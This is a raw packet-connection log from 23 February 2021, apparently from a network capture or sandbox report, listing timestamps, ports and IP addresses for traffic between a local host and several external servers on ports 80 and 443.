Feb 23, 2021 17:50:59.044564009 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.088671923 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.088793993 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.089148998 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.133135080 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.219062090 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.220699072 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.264672041 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.347143888 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.349730015 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.393693924 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.467884064 CET	80	49784	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.522871971 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.546586990 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.590338945 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.590461969 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.591033936 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:59.634772062 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.902120113 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:59.902282000 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:01.676224947 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:01.676261902 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:01.676306963 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:01.676343918 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:01.941335917 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:01.941363096 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:01.941448927 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:02.677211046 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:51:02.677242994 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:51:02.677402020 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:02.750955105 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:02.751074076 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:02.839570045 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:51:02.839606047 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:51:03.512813091 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:51:03.512846947 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:51:03.513169050 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:51:16.291553974 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:51:16.291600943 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:51:16.291889906 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.291923046 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.292177916 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.292202950 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.352148056 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:16.352211952 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.352300882 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:16.352356911 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.362692118 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:51:16.362797976 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:51:16.405498028 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:51:16.405561924 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:51:16.405890942 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.405926943 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.406172991 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:51:16.406209946 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:51:16.449896097 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:51:16.449939966 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:51:16.450400114 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:51:16.450417995 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:51:16.450774908 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:51:16.450805902 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:51:16.466214895 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:51:16.489857912 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:51:16.496908903 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:16.496967077 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:16.497282028 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:16.497313023 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:51:16.539134979 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:51:16.539180994 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:51:16.539746046 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:51:16.539804935 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:51:16.540163040 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.541074038 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.625422955 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:16.625483990 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:51:25.673471928 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.673909903 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.717360973 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.717488050 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.717820883 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.717833042 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.717839956 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.717848063 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.717860937 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.717868090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.718025923 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.718089104 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.761313915 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.761437893 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.761745930 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.761761904 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.761781931 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.761794090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.761806965 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.761828899 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.761867046 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.762074947 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762088060 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762099981 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762109995 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762120962 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762130976 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762140036 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.762145996 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762159109 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.762187004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.762237072 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.805330038 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.805366039 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.805473089 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.805530071 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.805934906 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806034088 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806041956 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806078911 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806119919 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806129932 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806160927 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806173086 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806221962 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806226969 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806263924 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806267977 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806301117 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806325912 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806329966 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806349993 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806363106 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806417942 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806421995 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806448936 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806452036 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806492090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806493998 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806516886 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806592941 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806675911 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806766987 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806772947 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.806793928 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806811094 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806828022 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806845903 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806864023 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806890011 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806907892 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806925058 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806941986 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.806953907 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.807166100 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.849515915 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.849565029 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.849597931 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.849750996 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.849829912 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.850678921 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850735903 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850771904 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850835085 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850851059 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.850881100 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850908995 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850950956 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850956917 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.850980997 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.850982904 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851023912 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851033926 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851043940 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851063013 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851078987 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851097107 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851116896 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851190090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851279974 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851301908 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851351023 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851396084 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851444006 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851450920 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851536989 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851625919 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851655960 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851699114 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851703882 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851739883 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851757050 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851771116 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851823092 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851824045 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851861954 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851908922 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851927042 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851931095 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851955891 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.851996899 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.851998091 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852022886 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852041006 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852057934 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852078915 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852118969 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852118969 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852135897 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852168083 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852200985 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852220058 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852237940 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852252007 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852298975 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852298021 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852317095 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852324009 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852381945 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852405071 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852416039 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852497101 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852510929 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852571011 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852574110 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852632046 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852648020 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852684975 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852705002 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852735043 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852751017 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852788925 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852792978 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852821112 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852854967 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852871895 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852890968 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852910042 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852933884 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852940083 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.852966070 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.852977037 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853001118 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853003025 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853029966 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853033066 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853077888 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853113890 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853127003 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853143930 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853162050 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853176117 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853214979 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853239059 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853344917 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853425026 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853431940 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853454113 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853487015 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853503942 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853533983 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853539944 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853549004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853571892 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853598118 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853615046 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853638887 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853658915 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853667021 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853698969 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853737116 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853758097 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853759050 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853823900 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853825092 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853889942 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853893995 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853918076 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853943110 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.853981972 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.853984118 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854001999 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854012012 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854036093 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854079008 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854084969 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854104996 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854110956 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854144096 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854167938 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854223013 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854254961 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854296923 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.854300976 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854325056 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.854351997 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.893671036 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.893701077 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.893709898 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.893719912 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.893770933 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.893778086 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.893827915 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.893846989 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.893887997 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.893958092 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.894460917 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.894679070 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.894753933 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.894795895 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.894838095 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.894875050 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.894957066 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.895057917 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.895998955 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.896224976 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.897790909 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.897880077 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.897967100 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898061037 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898144007 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.898185015 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898238897 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898314953 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.898364067 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898447037 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898531914 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.898564100 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898653030 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.898746967 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.899272919 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899286985 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899295092 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899386883 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.899496078 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899533987 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899547100 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899561882 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899596930 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899607897 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899630070 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.899658918 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.899697065 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899741888 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.899785995 CET	49785	80	192.168.2.6	47.91.94.99
